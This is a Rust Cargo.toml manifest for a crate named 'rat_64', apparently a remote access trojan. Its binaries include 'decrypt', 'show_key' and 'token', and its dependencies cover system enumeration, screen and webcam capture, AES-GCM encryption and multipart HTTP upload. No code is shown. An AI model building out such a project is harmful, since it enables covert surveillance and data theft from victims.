[package]
name = "rat_64"
version = "0.1.0"
edition = "2021"
default-run = "rat_64"

[lib]
name = "rat_64"
path = "src/lib.rs"

[[bin]]
name = "rat_64"
path = "src/main.rs"

[[bin]]
name = "decrypt"
path = "src/bin/decrypt.rs"

[[bin]]
name = "show_key"
path = "src/bin/show_key.rs"

[[bin]]
name = "token"
path = "src/bin/token.rs"

[dependencies]
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
sysinfo = "0.37.0"
whoami = "1.6.1"
rand = "0.9.2"
aes-gcm = "0.10"
rmp-serde = "1.1"
reqwest = { version = "0.12.23", features = ["blocking", "multipart"] }
base64 = "0.22.1"
local_ipaddress = "0.1"
scrap = "0.5"
image = "0.25.8"
opencv = { version = "0.95.1", optional = true }
os_info = "3.12.0"
regex = "1.11.2"

[target.'cfg(windows)'.dependencies]
wmi = "0.17.2"

[features]
default = []
webcam = ["opencv"]